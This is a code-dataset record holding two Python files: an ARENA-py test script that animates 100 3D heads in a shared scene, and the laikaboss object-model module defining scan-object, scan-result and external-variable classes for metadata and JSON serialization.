system-tests/headbanger.py
|
jameszha/ARENA-py
|
209d93e9b91ba1d0c306b307e6dcb8411aada5b3
|
[
"BSD-3-Clause"
] | null | null | null |
system-tests/headbanger.py
|
jameszha/ARENA-py
|
209d93e9b91ba1d0c306b307e6dcb8411aada5b3
|
[
"BSD-3-Clause"
] | null | null | null |
from arena import *
import random
import datetime
import time
scene = Scene(host="arenaxr.org", realm="realm", scene="headbanger", )
# Create models
# How Many heads?
heads=100
# Type of head. 0- box, 1- GLTF
head_type=1
headlist = []
cnt=0
for x in range(heads):
if head_type==1:
head = GLTF(
object_id="head"+str(cnt),
position=(random.random()*10, 1.5, random.random()*-10),
scale=(1, 1, 1),
url="https://www.dropbox.com/s/e28sgj44mwy0bbg/loomis-purple.glb?dl=0"
)
else:
head = Box(
object_id="head"+str(cnt),
position=(random.random()*10, 1.5, random.random()*-10),
scale=(.1, .1, .1),
)
headlist.append(head)
cnt=cnt+1
i=0
cnt=0
cycle=0
last = datetime.datetime.now()
@scene.run_once
def main():
print("Adding heads" )
for head in headlist:
scene.add_object(head)
@scene.run_forever(interval_ms=100)
def update():
global i, headlist, cnt, last,cycle
if cnt<100:
print("waiting...")
cnt=cnt+1
return
i=(i+15) % 360
for head in headlist:
if i==0:
head.data.position.y = cycle%3 + 1
if(cycle%3==0):
scene.update_object( head, rotation=(0, i, 0),color=(255, 0, 0))
if(cycle%3==1):
scene.update_object( head, rotation=(0, i, 0),color=(0, 255, 0))
if(cycle%3==2):
scene.update_object( head, rotation=(0, i, 0),color=(0, 0, 255))
else:
scene.update_object( head, rotation=(0, i, 0),color=(128, 128, 128))
if i==0:
if(cycle%3==0):
print("********************************** Red Low")
if(cycle%3==1):
print("********************************** Green Middle")
if(cycle%3==2):
print("********************************** Blue High")
cycle=cycle+1
cnt=cnt+1
now = datetime.datetime.now()
c = now-last
last=now
print("Heads: " + str(heads) + " Tick: " + str(cnt) + " Time: " + str(c.microseconds/1000) + "ms" )
scene.run_tasks()
| 25.768293
| 103
| 0.515381
|
from arena import *
import random
import datetime
import time
scene = Scene(host="arenaxr.org", realm="realm", scene="headbanger", )
heads=100
head_type=1
headlist = []
cnt=0
for x in range(heads):
if head_type==1:
head = GLTF(
object_id="head"+str(cnt),
position=(random.random()*10, 1.5, random.random()*-10),
scale=(1, 1, 1),
url="https://www.dropbox.com/s/e28sgj44mwy0bbg/loomis-purple.glb?dl=0"
)
else:
head = Box(
object_id="head"+str(cnt),
position=(random.random()*10, 1.5, random.random()*-10),
scale=(.1, .1, .1),
)
headlist.append(head)
cnt=cnt+1
i=0
cnt=0
cycle=0
last = datetime.datetime.now()
@scene.run_once
def main():
print("Adding heads" )
for head in headlist:
scene.add_object(head)
@scene.run_forever(interval_ms=100)
def update():
global i, headlist, cnt, last,cycle
if cnt<100:
print("waiting...")
cnt=cnt+1
return
i=(i+15) % 360
for head in headlist:
if i==0:
head.data.position.y = cycle%3 + 1
if(cycle%3==0):
scene.update_object( head, rotation=(0, i, 0),color=(255, 0, 0))
if(cycle%3==1):
scene.update_object( head, rotation=(0, i, 0),color=(0, 255, 0))
if(cycle%3==2):
scene.update_object( head, rotation=(0, i, 0),color=(0, 0, 255))
else:
scene.update_object( head, rotation=(0, i, 0),color=(128, 128, 128))
if i==0:
if(cycle%3==0):
print("********************************** Red Low")
if(cycle%3==1):
print("********************************** Green Middle")
if(cycle%3==2):
print("********************************** Blue High")
cycle=cycle+1
cnt=cnt+1
now = datetime.datetime.now()
c = now-last
last=now
print("Heads: " + str(heads) + " Tick: " + str(cnt) + " Time: " + str(c.microseconds/1000) + "ms" )
scene.run_tasks()
| true
| true
|
1c492ca7cd4baf1ea04cbb601645e54184e6e258
| 20,735
|
py
|
Python
|
laikaboss/objectmodel.py
|
sandialabs/laikaboss
|
3064ac1176911651d61c5176e9bd83eacec36b16
|
[
"Apache-2.0"
] | 2
|
2019-11-02T23:40:23.000Z
|
2019-12-01T22:24:57.000Z
|
laikaboss/objectmodel.py
|
sandialabs/laikaboss
|
3064ac1176911651d61c5176e9bd83eacec36b16
|
[
"Apache-2.0"
] | null | null | null |
laikaboss/objectmodel.py
|
sandialabs/laikaboss
|
3064ac1176911651d61c5176e9bd83eacec36b16
|
[
"Apache-2.0"
] | 3
|
2017-08-09T23:58:40.000Z
|
2019-12-01T22:25:06.000Z
|
# Copyright 2015 Lockheed Martin Corporation
# Copyright 2020 National Technology & Engineering Solutions of Sandia, LLC
# (NTESS). Under the terms of Contract DE-NA0003525 with NTESS, the U.S.
# Government retains certain rights in this software.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Set up classes
from builtins import bytes
from builtins import str
from past.builtins import basestring
from builtins import object
from builtins import int
from laikaboss.constants import level_minimal, level_metadata
import logging
import base64
import time
import uuid
import json
# Metadata, etc. is always stored directly as unicode
def convertToUTF8(thing):
if isinstance(thing, bytes):
new_str = str(thing, "utf-8", errors="replace")
return new_str
elif isinstance(thing, str):
return str(thing)
elif isinstance(thing, (list, set, frozenset)):
new_obj = []
for o in thing:
new_obj.append(convertToUTF8(o))
return new_obj
elif isinstance(thing, tuple):
new_tuple = ()
for o in thing:
new_tuple += (convertToUTF8(o), )
return new_tuple
elif isinstance(thing, dict):
new_obj = {}
for key, value in thing.items():
new_key = cleanKey(key)
new_val = convertToUTF8(value)
new_obj[new_key] = new_val
return new_obj
elif isinstance(thing, bool):
return thing
elif isinstance(thing, (int, float, complex)):
if isinstance(thing, int) and type(thing) is not int:
return int(thing)
return thing
elif isinstance(thing, uuid.UUID):
return str(thing)
else:
return str(repr(thing))
# Utility function to (conditionally) convert a unicode buffer to UTF-8
# Note that str is a unicode type with "from builtins import str"
def ensureNotUnicode(buffer):
if isinstance(buffer, str):
return buffer.encode("utf-8")
else:
return buffer
# Utility function to make sure the buffer is a bytestring and not None
# (or whatever other weirdness comes through)
def ensureBytes(child_buffer):
# buffers and bytearrays can be cast to bytes
try:
if isinstance(child_buffer, memoryview) or isinstance(child_buffer, bytearray):
child_buffer = bytes(child_buffer)
except:
# Test cases do not produce any exceptions, but it's here just in case
raise Exception("Buffer of %s found, not creating child scanObject" % str(type(child_buffer)))
child_buffer = ensureNotUnicode(child_buffer)
# refuse to process anything else, as non-bytestring objects can crash the worker
if not isinstance(child_buffer, bytes):
raise Exception("Buffer of %s found, not creating child scanObject" % str(type(child_buffer)))
return child_buffer
def cleanKey(key):
bad_chars = ["\0", ".", "$"]
new_key = convertToUTF8(key)
if isinstance(new_key, str): # For now, allow keys to be booleans or integers
for c in bad_chars:
new_key = new_key.replace(c, "_")
return new_key
class ScanError(RuntimeError):
"""Base error for any laika runtime errors"""
pass
class QuitScanException(ScanError):
"""Quit a scan prematurely"""
pass
class GlobalScanTimeoutError(ScanError):
"""Global timeout for an entire scan"""
pass
class GlobalModuleTimeoutError(ScanError):
"""Global timeout for any module within a scan"""
pass
class ScanObject(object):
def __init__(
self,
objectHash="",
contentType=[],
fileType=[],
buffer="",
objectSize=0,
filename="",
ephID="",
uniqID="",
parent="",
parent_order=-1,
sourceModule="",
source="",
depth=-1,
order=-1,
rootUID="",
origRootUID="",
charset="",
level=level_minimal,
uuid=str(uuid.uuid4()),
):
self.contentType = convertToUTF8(contentType)
self.fileType = fileType
self.scanModules = []
self.flags = []
self.objectHash = objectHash
self.buffer = ensureBytes(buffer)
self.objectSize = objectSize
self.filename = convertToUTF8(filename)
self.ephID = convertToUTF8(ephID)
self.uniqID = convertToUTF8(uniqID)
self.uuid = uuid
self.parent = parent
self.parent_order = parent_order
self.sourceModule = convertToUTF8(sourceModule)
self.source = convertToUTF8(source)
self.moduleMetadata = {}
self.level = level
self.depth = convertToUTF8(depth)
self.order = order
self.rootUID = ""
self.origRootUID = origRootUID
self.charset = charset
self.scanTime = int(time.time())
# Wrapper function to add flags to the object
def addFlag(self, flag):
flag = convertToUTF8(flag)
if flag not in self.flags:
self.flags.append(flag)
# Wrapper function for adding metadata to the object
def addMetadata(self, moduleName, key, value, unique=False, maxlen=0):
# Convert the value into UTF8, regardless of type (function will handle it)
value = convertToUTF8(value)
key = cleanKey(key)
if maxlen:
try:
if len(value) > maxlen:
logging.warn('truncating value of rootUID:%s uuid:%s filename:%s, module_name:%s key:%s ' % (self.rootUID, self.uuid, self.filename, moduleName, key))
value = (value[:maxlen] + '.._truncated')
except TypeError as e:
# it may be a type which doesn't support len
pass
# If no metadata exists for this module yet, add a new dictionary with the key/value pair
if moduleName not in self.moduleMetadata:
self.moduleMetadata[moduleName] = {key: value}
# If metadata already exists for this module, first check if the key exists
else:
# If the key doesn't already exist, add it to the dictionary
if key not in self.moduleMetadata[moduleName]:
if isinstance(value, list) and unique:
self.moduleMetadata[moduleName][key] = list(set(value))
else:
self.moduleMetadata[moduleName][key] = value
# Otherwise, check to see if its a list
else:
if type(self.moduleMetadata[moduleName][key]) is list:
# Check to see if it's in the list. If it is and unique is specified, don't add it
if isinstance(value, list):
if unique:
self.moduleMetadata[moduleName][key].extend([x for x in value if x not in self.moduleMetadata[moduleName][key]])
else:
self.moduleMetadata[moduleName][key].extend(value)
else:
if value not in self.moduleMetadata[moduleName][key] or not unique:
self.moduleMetadata[moduleName][key].append(value)
# If it's not a list, convert it to one.
else:
metalist = []
metalist.append(self.moduleMetadata[moduleName][key])
if isinstance(value, list):
if unique:
metalist.extend([x for x in list(set(value)) if x != self.moduleMetadata[moduleName][key]])
else:
metalist.extend(value)
else:
if value not in metalist or not unique:
metalist.append(value)
self.moduleMetadata[moduleName][key] = metalist
# Wrapper function for retrieving metadata from the object.
# If you don't specify a key this function returns a dictionary containing all metadata
# for the specified module.
def getMetadata(self, moduleName, key=None):
# Return a specific piece of metadata for a specific module
if key is not None:
if moduleName in self.moduleMetadata:
if key in self.moduleMetadata[moduleName]:
return self.moduleMetadata[moduleName][key]
else:
return ""
else:
return ""
# Return all metadata for a specific module
else:
if moduleName in self.moduleMetadata:
return self.moduleMetadata[moduleName]
else:
return {}
# This function is used for serializing ScanObjects
def serialize(self):
# If the return level is minimal, delete the buffer and metadata
if self.level == level_minimal:
odict = self.__dict__.copy()
del odict["buffer"]
del odict["moduleMetadata"]
# If the return level is metadata, delete the buffer
elif self.level == level_metadata:
odict = self.__dict__.copy()
del odict["buffer"]
else:
odict = self.__dict__
return odict
def __getstate__(self):
return self.serialize()
class ScanResult(object):
def __init__(self, source=None, level=None, rootUID=None, submitID=None):
self.files = {}
self.startTime = 0
self.disposition = ""
if source is not None:
self.source = source
else:
self.source = ""
if level is not None:
self.level = level
else:
self.level = level_minimal
if rootUID is not None:
self.rootUID = rootUID
else:
self.rootUID = ""
if submitID:
self.submitID = submitID
else:
self.submitID = ""
files = {}
startTime = 0
source = ""
level = ""
rootUID = ""
disposition = ""
submitID = ""
@staticmethod
def encode(scanresult):
d = {}
serialized_files = {}
for f in scanresult.files:
serialized_files[f] = scanresult.files[f].serialize()
d["files"] = serialized_files
d["startTime"] = scanresult.startTime
d["source"] = scanresult.source
d["level"] = scanresult.level
d["rootUID"] = scanresult.rootUID
d["disposition"] = scanresult.disposition
d["submitID"] = scanresult.submitID
try:
d = convertToUTF8(d)
except Exception as e:
logging.exception("serialization error:")
store_str = json.dumps(d, ensure_ascii=False)
if not isinstance(store_str, bytes):
store_str = store_str.encode("utf-8", errors="replace")
return store_str
@staticmethod
def decode(buf):
if not isinstance(buf, str):
buf = buf.decode("utf-8", errors="replace")
d = json.loads(buf)
result = ScanResult(source=d.get('source', ""), level=d.get('level', 0), rootUID=d.get('rootUID',""), submitID=d.get('submitID', ""))
result.startTime = d.get("startTime", 0)
result.files = d.get("files",{})
result.disposition = d.get("disposition",{})
return result
class SI_Object(object):
def __init__(self, buffer, externalVars):
self.buffer = ensureBytes(buffer)
self.externalVars = externalVars
buffer = ""
externalVars = None
class ModuleObject(SI_Object):
pass
class ExternalObject(SI_Object):
def __init__(self, buffer, externalVars, level=level_minimal):
self.level = level
if not isinstance(buffer, bytes):
buffer = buffer.encode("utf-8", errors="replace")
self.buffer = buffer
self.externalVars = externalVars
level = ""
@staticmethod
def encode(external_obj, ver=2):
d = {}
buf = external_obj.buffer
if not isinstance(buf, bytes):
buf = buf.encode("utf-8", errors="replace")
d["buffer"] = base64.standard_b64encode(buf)
d["level"] = external_obj.level
d["externalVars"] = external_obj.externalVars.encode(as_dict=True)
d["ver"] = ver
try:
d = convertToUTF8(d)
except Exception as e:
logging.exception("serialization error:")
store_str = json.dumps(d, ensure_ascii=False)
if not isinstance(store_str, bytes):
store_str = store_str.encode("utf-8", errors="replace")
return store_str
@staticmethod
def decode(encoded):
try:
d = json.loads(encoded)
except Exception as e:
logging.exception("decode error len= " + str(len(encoded)) + " encoded: '" + str(encoded[:100]) + "'")
raise e
# would we prefer unicode or utf-8 here? IDK
try:
d = convertToUTF8(d)
except Exception as e:
logging.exception("decode error convert to utf-8")
raise e
buf = base64.standard_b64decode(d["buffer"])
level = d.get("level", level_minimal)
ext_vars_dict = d.get("externalVars")
externalVars = ExternalVars(**ext_vars_dict)
return ExternalObject(buf, externalVars, level=level)
class ExternalVars(object):
def __init__(
self,
sourceModule="",
parentModules="",
contentType=[],
charset="",
filename="",
ephID="",
uniqID="",
timestamp="",
source="",
flags="",
parent="",
parent_order=-1,
depth=0,
origRootUID="",
comment="",
submitter="",
submitID="",
extArgs={},
extMetaData={},
**kwargs
):
self.sourceModule = sourceModule
self.parentModules = parentModules
self._contentType = []
self.set_contentType(contentType)
self.set_charset(charset)
self.set_filename(filename)
self.set_ephID(ephID)
self.set_uniqID(uniqID)
self.set_timestamp(timestamp)
self.set_source(source)
self.flags = flags
self.parent = parent
self.parent_order = parent_order
self.depth = depth
self.set_origRootUID(origRootUID)
self.set_extMetaData(extMetaData)
self.set_extArgs(extArgs)
self.set_submitter(submitter)
self.set_comment(comment)
self.set_submitID(submitID)
def encode(self, as_dict=False):
d = {
"sourceModule": self.sourceModule,
"parentModules": self.parentModules,
"contentType": self.get_contentType(),
"charset": self.get_charset(),
"filename": self.get_filename(),
"ephID": self.get_ephID(),
"uniqID": self.get_uniqID(),
"timestamp": self.get_timestamp(),
"source": self.get_source(),
"flags": self.flags,
"parent": self.parent,
"parent_order": self.parent_order,
"depth": self.depth,
"origRootUID": self.get_origRootUID(),
"comment": self.get_comment(),
"submitter": self.get_submitter(),
"submitID": self.get_submitID(),
"extArgs": self.get_extArgs(),
"extMetaData": self.get_extMetaData(),
}
if as_dict:
return d
store_str = json.dumps(d, ensure_ascii=False)
try:
submitID = d.get("submitID", "")
store_str = convertToUTF8(store_str)
except Exception as e:
logging.exception("serialization error error:" + submitID)
raise
return store_str
def get_contentType(self):
return self._contentType
def set_contentType(self, value):
self._contentType = []
if type(value) is list:
self._contentType.extend(convertToUTF8(value))
else:
self._contentType.append(convertToUTF8(value))
def get_charset(self):
return self._charset
def set_charset(self, value):
self._charset = convertToUTF8(value)
def get_filename(self):
return self._filename
def set_filename(self, filename):
self._filename = convertToUTF8(filename)
# Filenames must always be python native strings for compatibility
if not isinstance(self._filename, str):
self._filename = self._filename.encode("utf-8")
def get_ephID(self):
return self._ephID
def set_ephID(self, ephID):
self._ephID = convertToUTF8(ephID)
def get_uniqID(self):
return self._uniqID
def set_uniqID(self, uniqID):
self._uniqID = convertToUTF8(uniqID)
def get_timestamp(self):
return self._timestamp
def set_timestamp(self, timestamp):
self._timestamp = convertToUTF8(timestamp)
def get_source(self):
return self._source
def set_source(self, source):
self._source = convertToUTF8(source)
def get_origRootUID(self):
return self._origRootUID
def set_origRootUID(self, origRootUID):
self._origRootUID = convertToUTF8(origRootUID)
def get_extMetaData(self):
return self._extMetaData
def set_extMetaData(self, extMetaData):
try:
extMetaData = json.loads(extMetaData)
except ValueError:
pass
except TypeError:
pass
# in case someone sent an empty string or None
if not extMetaData:
extMetadata = {}
self._extMetaData = convertToUTF8(extMetaData)
def set_comment(self, comment):
self._comment = convertToUTF8(comment)
self._setMetaItem("laikaboss_ext", "comment", self._comment)
def get_comment(self):
return self._comment
def set_submitter(self, submitter):
self._submitter = convertToUTF8(submitter)
self._setMetaItem("laikaboss_ext", "submitter", self._submitter)
def get_submitter(self):
return self._submitter
def set_submitID(self, submitID):
self._submitID = convertToUTF8(submitID)
self._setMetaItem("laikaboss_ext", "submitID", self._submitID)
def get_submitID(self):
return self._submitID
def set_extArgs(self, extArgs):
try:
extMetaData = json.loads(extArgs)
except ValueError:
pass
except TypeError:
pass
# in case someone sent an empty string or None
if not extArgs:
extArgs = {}
# put in a top level variable and in the extMetadata for now
self._extArgs = convertToUTF8(extArgs)
self._setMetaItem("args", value=self._extArgs)
def get_extArgs(self):
return self._extArgs
def _setMetaItem(self, key1, key2=None, value=None):
extMetaData = self._extMetaData
if key2:
m_ext = extMetaData.get(key1, {})
m_ext[key2] = value
extMetaData[key1] = m_ext
elif value:
try:
extMetaData[key1] = value
except Exception as e:
err = " raise: '" + str(extMetaData) + "'"
err += " type:" + str(type(extMetaData))
err += " e:" + str(e)
raise TypeError(err)
self._extMetaData = extMetaData
sourceModule = ""
parentModules = ""
_contentType = []
contentType = property(get_contentType, set_contentType)
charset = property(get_charset, set_charset)
filename = property(get_filename, set_filename)
ephID = property(get_ephID, set_ephID)
uniqID = property(get_uniqID, set_uniqID)
timestamp = property(get_timestamp, set_timestamp)
source = property(get_source, set_source)
flags = ""
parent = ""
depth = 0
rootUID = ""
origRootUID = property(get_origRootUID, set_origRootUID)
extMetaData = property(get_extMetaData, set_extMetaData)
submitID = property(get_submitID, set_submitID)
submitter = property(get_submitter, set_submitter)
comment = property(get_comment, set_comment)
extArgs = property(get_extArgs, set_extArgs)
| 31.22741
| 167
| 0.599518
|
from builtins import bytes
from builtins import str
from past.builtins import basestring
from builtins import object
from builtins import int
from laikaboss.constants import level_minimal, level_metadata
import logging
import base64
import time
import uuid
import json
def convertToUTF8(thing):
if isinstance(thing, bytes):
new_str = str(thing, "utf-8", errors="replace")
return new_str
elif isinstance(thing, str):
return str(thing)
elif isinstance(thing, (list, set, frozenset)):
new_obj = []
for o in thing:
new_obj.append(convertToUTF8(o))
return new_obj
elif isinstance(thing, tuple):
new_tuple = ()
for o in thing:
new_tuple += (convertToUTF8(o), )
return new_tuple
elif isinstance(thing, dict):
new_obj = {}
for key, value in thing.items():
new_key = cleanKey(key)
new_val = convertToUTF8(value)
new_obj[new_key] = new_val
return new_obj
elif isinstance(thing, bool):
return thing
elif isinstance(thing, (int, float, complex)):
if isinstance(thing, int) and type(thing) is not int:
return int(thing)
return thing
elif isinstance(thing, uuid.UUID):
return str(thing)
else:
return str(repr(thing))
def ensureNotUnicode(buffer):
if isinstance(buffer, str):
return buffer.encode("utf-8")
else:
return buffer
def ensureBytes(child_buffer):
try:
if isinstance(child_buffer, memoryview) or isinstance(child_buffer, bytearray):
child_buffer = bytes(child_buffer)
except:
raise Exception("Buffer of %s found, not creating child scanObject" % str(type(child_buffer)))
child_buffer = ensureNotUnicode(child_buffer)
# refuse to process anything else, as non-bytestring objects can crash the worker
if not isinstance(child_buffer, bytes):
raise Exception("Buffer of %s found, not creating child scanObject" % str(type(child_buffer)))
return child_buffer
def cleanKey(key):
bad_chars = ["\0", ".", "$"]
new_key = convertToUTF8(key)
if isinstance(new_key, str): # For now, allow keys to be booleans or integers
for c in bad_chars:
new_key = new_key.replace(c, "_")
return new_key
class ScanError(RuntimeError):
pass
class QuitScanException(ScanError):
pass
class GlobalScanTimeoutError(ScanError):
pass
class GlobalModuleTimeoutError(ScanError):
pass
class ScanObject(object):
def __init__(
self,
objectHash="",
contentType=[],
fileType=[],
buffer="",
objectSize=0,
filename="",
ephID="",
uniqID="",
parent="",
parent_order=-1,
sourceModule="",
source="",
depth=-1,
order=-1,
rootUID="",
origRootUID="",
charset="",
level=level_minimal,
uuid=str(uuid.uuid4()),
):
self.contentType = convertToUTF8(contentType)
self.fileType = fileType
self.scanModules = []
self.flags = []
self.objectHash = objectHash
self.buffer = ensureBytes(buffer)
self.objectSize = objectSize
self.filename = convertToUTF8(filename)
self.ephID = convertToUTF8(ephID)
self.uniqID = convertToUTF8(uniqID)
self.uuid = uuid
self.parent = parent
self.parent_order = parent_order
self.sourceModule = convertToUTF8(sourceModule)
self.source = convertToUTF8(source)
self.moduleMetadata = {}
self.level = level
self.depth = convertToUTF8(depth)
self.order = order
self.rootUID = ""
self.origRootUID = origRootUID
self.charset = charset
self.scanTime = int(time.time())
# Wrapper function to add flags to the object
def addFlag(self, flag):
flag = convertToUTF8(flag)
if flag not in self.flags:
self.flags.append(flag)
# Wrapper function for adding metadata to the object
def addMetadata(self, moduleName, key, value, unique=False, maxlen=0):
# Convert the value into UTF8, regardless of type (function will handle it)
value = convertToUTF8(value)
key = cleanKey(key)
if maxlen:
try:
if len(value) > maxlen:
logging.warn('truncating value of rootUID:%s uuid:%s filename:%s, module_name:%s key:%s ' % (self.rootUID, self.uuid, self.filename, moduleName, key))
value = (value[:maxlen] + '.._truncated')
except TypeError as e:
# it may be a type which doesn't support len
pass
if moduleName not in self.moduleMetadata:
self.moduleMetadata[moduleName] = {key: value}
else:
if key not in self.moduleMetadata[moduleName]:
if isinstance(value, list) and unique:
self.moduleMetadata[moduleName][key] = list(set(value))
else:
self.moduleMetadata[moduleName][key] = value
# Otherwise, check to see if its a list
else:
if type(self.moduleMetadata[moduleName][key]) is list:
# Check to see if it's in the list. If it is and unique is specified, don't add it
if isinstance(value, list):
if unique:
self.moduleMetadata[moduleName][key].extend([x for x in value if x not in self.moduleMetadata[moduleName][key]])
else:
self.moduleMetadata[moduleName][key].extend(value)
else:
if value not in self.moduleMetadata[moduleName][key] or not unique:
self.moduleMetadata[moduleName][key].append(value)
# If it's not a list, convert it to one.
else:
metalist = []
metalist.append(self.moduleMetadata[moduleName][key])
if isinstance(value, list):
if unique:
metalist.extend([x for x in list(set(value)) if x != self.moduleMetadata[moduleName][key]])
else:
metalist.extend(value)
else:
if value not in metalist or not unique:
metalist.append(value)
self.moduleMetadata[moduleName][key] = metalist
# for the specified module.
def getMetadata(self, moduleName, key=None):
# Return a specific piece of metadata for a specific module
if key is not None:
if moduleName in self.moduleMetadata:
if key in self.moduleMetadata[moduleName]:
return self.moduleMetadata[moduleName][key]
else:
return ""
else:
return ""
# Return all metadata for a specific module
else:
if moduleName in self.moduleMetadata:
return self.moduleMetadata[moduleName]
else:
return {}
# This function is used for serializing ScanObjects
def serialize(self):
# If the return level is minimal, delete the buffer and metadata
if self.level == level_minimal:
odict = self.__dict__.copy()
del odict["buffer"]
del odict["moduleMetadata"]
# If the return level is metadata, delete the buffer
elif self.level == level_metadata:
odict = self.__dict__.copy()
del odict["buffer"]
else:
odict = self.__dict__
return odict
def __getstate__(self):
return self.serialize()
class ScanResult(object):
def __init__(self, source=None, level=None, rootUID=None, submitID=None):
self.files = {}
self.startTime = 0
self.disposition = ""
if source is not None:
self.source = source
else:
self.source = ""
if level is not None:
self.level = level
else:
self.level = level_minimal
if rootUID is not None:
self.rootUID = rootUID
else:
self.rootUID = ""
if submitID:
self.submitID = submitID
else:
self.submitID = ""
files = {}
startTime = 0
source = ""
level = ""
rootUID = ""
disposition = ""
submitID = ""
@staticmethod
def encode(scanresult):
d = {}
serialized_files = {}
for f in scanresult.files:
serialized_files[f] = scanresult.files[f].serialize()
d["files"] = serialized_files
d["startTime"] = scanresult.startTime
d["source"] = scanresult.source
d["level"] = scanresult.level
d["rootUID"] = scanresult.rootUID
d["disposition"] = scanresult.disposition
d["submitID"] = scanresult.submitID
try:
d = convertToUTF8(d)
except Exception as e:
logging.exception("serialization error:")
store_str = json.dumps(d, ensure_ascii=False)
if not isinstance(store_str, bytes):
store_str = store_str.encode("utf-8", errors="replace")
return store_str
@staticmethod
def decode(buf):
if not isinstance(buf, str):
buf = buf.decode("utf-8", errors="replace")
d = json.loads(buf)
result = ScanResult(source=d.get('source', ""), level=d.get('level', 0), rootUID=d.get('rootUID',""), submitID=d.get('submitID', ""))
result.startTime = d.get("startTime", 0)
result.files = d.get("files",{})
result.disposition = d.get("disposition",{})
return result
class SI_Object(object):
def __init__(self, buffer, externalVars):
self.buffer = ensureBytes(buffer)
self.externalVars = externalVars
buffer = ""
externalVars = None
class ModuleObject(SI_Object):
pass
class ExternalObject(SI_Object):
def __init__(self, buffer, externalVars, level=level_minimal):
self.level = level
if not isinstance(buffer, bytes):
buffer = buffer.encode("utf-8", errors="replace")
self.buffer = buffer
self.externalVars = externalVars
level = ""
@staticmethod
def encode(external_obj, ver=2):
d = {}
buf = external_obj.buffer
if not isinstance(buf, bytes):
buf = buf.encode("utf-8", errors="replace")
d["buffer"] = base64.standard_b64encode(buf)
d["level"] = external_obj.level
d["externalVars"] = external_obj.externalVars.encode(as_dict=True)
d["ver"] = ver
try:
d = convertToUTF8(d)
except Exception as e:
logging.exception("serialization error:")
store_str = json.dumps(d, ensure_ascii=False)
if not isinstance(store_str, bytes):
store_str = store_str.encode("utf-8", errors="replace")
return store_str
@staticmethod
def decode(encoded):
try:
d = json.loads(encoded)
except Exception as e:
logging.exception("decode error len= " + str(len(encoded)) + " encoded: '" + str(encoded[:100]) + "'")
raise e
# would we prefer unicode or utf-8 here? IDK
try:
d = convertToUTF8(d)
except Exception as e:
logging.exception("decode error convert to utf-8")
raise e
buf = base64.standard_b64decode(d["buffer"])
level = d.get("level", level_minimal)
ext_vars_dict = d.get("externalVars")
externalVars = ExternalVars(**ext_vars_dict)
return ExternalObject(buf, externalVars, level=level)
class ExternalVars(object):
def __init__(
self,
sourceModule="",
parentModules="",
contentType=[],
charset="",
filename="",
ephID="",
uniqID="",
timestamp="",
source="",
flags="",
parent="",
parent_order=-1,
depth=0,
origRootUID="",
comment="",
submitter="",
submitID="",
extArgs={},
extMetaData={},
**kwargs
):
self.sourceModule = sourceModule
self.parentModules = parentModules
self._contentType = []
self.set_contentType(contentType)
self.set_charset(charset)
self.set_filename(filename)
self.set_ephID(ephID)
self.set_uniqID(uniqID)
self.set_timestamp(timestamp)
self.set_source(source)
self.flags = flags
self.parent = parent
self.parent_order = parent_order
self.depth = depth
self.set_origRootUID(origRootUID)
self.set_extMetaData(extMetaData)
self.set_extArgs(extArgs)
self.set_submitter(submitter)
self.set_comment(comment)
self.set_submitID(submitID)
def encode(self, as_dict=False):
d = {
"sourceModule": self.sourceModule,
"parentModules": self.parentModules,
"contentType": self.get_contentType(),
"charset": self.get_charset(),
"filename": self.get_filename(),
"ephID": self.get_ephID(),
"uniqID": self.get_uniqID(),
"timestamp": self.get_timestamp(),
"source": self.get_source(),
"flags": self.flags,
"parent": self.parent,
"parent_order": self.parent_order,
"depth": self.depth,
"origRootUID": self.get_origRootUID(),
"comment": self.get_comment(),
"submitter": self.get_submitter(),
"submitID": self.get_submitID(),
"extArgs": self.get_extArgs(),
"extMetaData": self.get_extMetaData(),
}
if as_dict:
return d
store_str = json.dumps(d, ensure_ascii=False)
try:
submitID = d.get("submitID", "")
store_str = convertToUTF8(store_str)
except Exception as e:
logging.exception("serialization error error:" + submitID)
raise
return store_str
def get_contentType(self):
return self._contentType
def set_contentType(self, value):
self._contentType = []
if type(value) is list:
self._contentType.extend(convertToUTF8(value))
else:
self._contentType.append(convertToUTF8(value))
def get_charset(self):
return self._charset
def set_charset(self, value):
self._charset = convertToUTF8(value)
def get_filename(self):
return self._filename
def set_filename(self, filename):
self._filename = convertToUTF8(filename)
# Filenames must always be python native strings for compatibility
if not isinstance(self._filename, str):
self._filename = self._filename.encode("utf-8")
def get_ephID(self):
return self._ephID
def set_ephID(self, ephID):
self._ephID = convertToUTF8(ephID)
def get_uniqID(self):
return self._uniqID
def set_uniqID(self, uniqID):
self._uniqID = convertToUTF8(uniqID)
def get_timestamp(self):
return self._timestamp
def set_timestamp(self, timestamp):
self._timestamp = convertToUTF8(timestamp)
def get_source(self):
return self._source
def set_source(self, source):
self._source = convertToUTF8(source)
def get_origRootUID(self):
return self._origRootUID
def set_origRootUID(self, origRootUID):
self._origRootUID = convertToUTF8(origRootUID)
def get_extMetaData(self):
return self._extMetaData
def set_extMetaData(self, extMetaData):
try:
extMetaData = json.loads(extMetaData)
except ValueError:
pass
except TypeError:
pass
# in case someone sent an empty string or None
if not extMetaData:
extMetadata = {}
self._extMetaData = convertToUTF8(extMetaData)
def set_comment(self, comment):
self._comment = convertToUTF8(comment)
self._setMetaItem("laikaboss_ext", "comment", self._comment)
def get_comment(self):
return self._comment
def set_submitter(self, submitter):
self._submitter = convertToUTF8(submitter)
self._setMetaItem("laikaboss_ext", "submitter", self._submitter)
def get_submitter(self):
return self._submitter
def set_submitID(self, submitID):
self._submitID = convertToUTF8(submitID)
self._setMetaItem("laikaboss_ext", "submitID", self._submitID)
def get_submitID(self):
return self._submitID
def set_extArgs(self, extArgs):
try:
extMetaData = json.loads(extArgs)
except ValueError:
pass
except TypeError:
pass
# in case someone sent an empty string or None
if not extArgs:
extArgs = {}
# put in a top level variable and in the extMetadata for now
self._extArgs = convertToUTF8(extArgs)
self._setMetaItem("args", value=self._extArgs)
def get_extArgs(self):
return self._extArgs
def _setMetaItem(self, key1, key2=None, value=None):
extMetaData = self._extMetaData
if key2:
m_ext = extMetaData.get(key1, {})
m_ext[key2] = value
extMetaData[key1] = m_ext
elif value:
try:
extMetaData[key1] = value
except Exception as e:
err = " raise: '" + str(extMetaData) + "'"
err += " type:" + str(type(extMetaData))
err += " e:" + str(e)
raise TypeError(err)
